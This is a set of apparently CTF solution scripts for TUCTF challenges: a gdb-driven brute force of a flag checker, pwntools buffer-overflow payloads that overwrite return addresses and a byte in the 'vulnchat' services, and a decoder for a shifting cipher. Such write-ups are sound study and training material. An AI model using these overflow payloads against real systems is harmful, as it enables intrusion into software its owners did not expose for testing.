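# gdb Python script: recover the expected input one character at a time by
# watching $rax at a fixed breakpoint.  Restored from a whitespace-collapsed
# paste (line breaks, indentation and the mis-encoded quotes were lost).
#
# `flag` (the prefix recovered so far) and `char_set` (candidate characters)
# are expected to be defined earlier in the gdb script; they are not shown on
# this page.
gdb.execute("b *0x0000000000401c82")

while True:
    for c in char_set:
        # Candidate input: known prefix, one guessed character, padded to 55.
        pattern = flag + c + "A" * (55 - len(flag))
        gdb.execute("r {}".format(pattern))
        # Skip the first len(flag) breakpoint hits (presumably one per
        # already-known character) before sampling the register.
        for i in range(len(flag)):
            gdb.execute("c")
        # execute(cmd, from_tty, to_string=True) returns the command output;
        # the last whitespace-separated token of `p/x $rax` is the hex value.
        rax = gdb.execute("p/x $rax", True, True).split()[-1]
        if rax == "0x0":
            flag += c
            if "}" in flag:
                print("Flag : %s" % (flag))
                exit(0)
            print("Curret Flag : %s" % (flag))
            sleep(1)
            break
        print("Pattern : %s" % (pattern))
        print("Nilai Rax : %s" % (rax))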

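# vulnchat: send two lines to the challenge service and print its reply.
# Restored from a collapsed paste: the `*` repetition operators were eaten by
# markdown emphasis ("A" 20 / "A" 49) and the quotes were mis-encoded.
vuln = remote("vulnchat.tuCTF.com", 4141)
payload = "A" * 20 + p32(0x00007325)  # overwrite with "%s"
vuln.sendlineafter("Enter your username: ", payload)
payload2 = "A" * 49 + p32(0x804856b)
vuln.sendlineafter(": ", payload2)
print(vuln.recvall())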

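# vulnchat2: same service family, second instance.  `flag` here is a single
# byte (0x72) appended after 43 bytes of padding; the name is the author's.
# Restored from a collapsed paste (line breaks and mis-encoded quotes).
flag = "\x72"
vuln2 = remote("vulnchat2.tuCTF.com", 4242)
vuln2.sendlineafter("Enter your username: ", "AAAA")
vuln2.recvuntil("AAAA: ")
payload = "A" * 43 + flag
vuln2.send(payload)
print(vuln2.recv(1024))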

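# neverending: open the connection used by round1() below and define the set
# of characters treated as "printable" by its decoding heuristic.
never = remote("neverending.tuCTF.com", 12345)
# ASCII letters, digits, a space and the ASCII punctuation characters.  The
# embedded double quote and the backslash are escaped here; on the page they
# appeared unescaped (markdown stripped the backslashes).
# NOTE(review): the page source shows extraction residue (`</span>s`) at the
# end of this literal, so one or more trailing characters may be missing --
# confirm against the original script.
char_set = ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 "
            "!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~")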

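def round1(char="A"):
    """Play one round against the `never` service.

    Sends ``char`` as the probe text, reads the two "... is ..." lines the
    service answers with, derives the per-round shift from the first
    character of the encoded base, applies that shift to the encoded
    message, nudges any characters that fell outside ``char_set`` back into
    it, and sends the result back as the answer.

    Uses the module-level ``never`` connection, ``char_set`` and ``log``.
    Written against the Python 2 pwntools API (``recvline()`` returns
    ``str``); on Python 3 the ``.split("is ")`` calls would need bytes.

    Restored from a paste that had lost its line breaks, indentation,
    syntax-highlighter markup and straight quotes.
    """
    never.sendlineafter("text:", char)
    enc_base = never.recvline().split("is ")[1]
    enc_msg = never.recvline().split("is ")[1]
    enc_msg = enc_msg.split(" decrypted?\n")[0]
    log.info("ENC BASE : -> {}".format(enc_base))
    log.info("ENC MSG : -> {}".format(enc_msg))
    # Shift = distance between what we sent and the first encoded character.
    cal = ord(char) - ord(enc_base[0])
    dec = "".join([chr(ord(b) + cal) for b in enc_msg])

    # Pass 1: characters now outside char_set are moved up by 95.
    # (The `if z not in char_set` on the already-filtered list is redundant
    # but kept as in the original.)
    non_printable = [chr(ord(z)) for z in dec if z not in char_set]
    printable = "".join([chr(ord(z) + 95) for z in non_printable if z not in char_set])
    for i in range(len(printable)):
        dec = dec.replace(non_printable[i], printable[i])

    # Pass 2: anything still outside char_set is moved down by 190.
    # NOTE(review): chr() of a value outside 0..255 raises ValueError on
    # Python 2; the original relies on the inputs never reaching that range.
    non_printable2 = [chr(ord(z)) for z in dec if z not in char_set]
    printable2 = "".join([chr(ord(z) - 190) for z in non_printable2 if z not in char_set])
    for i in range(len(printable2)):
        dec = dec.replace(non_printable2[i], printable2[i])

    log.info("Decrypted -> {}".format(repr(dec)))
    never.sendlineafter(":", dec)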

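# Drive up to 100 rounds.  Restored from a collapsed paste.  The original
# used a bare `except:`, which also swallows KeyboardInterrupt/SystemExit;
# narrowed to Exception so Ctrl-C still stops the script while pwntools
# I/O errors (EOF, timeouts) are still handled by dumping what is left and
# closing the connection.
for i in range(100):
    try:
        log.info("Round {0}".format(i))
        round1()
        # First token of the service's verdict line decides the outcome.
        if never.recvline().split()[0] == "Correct!":
            log.info("-> BENAR")
            continue
        log.info("-> SALAH")
    except Exception:
        print(never.recv())
        never.close()
        break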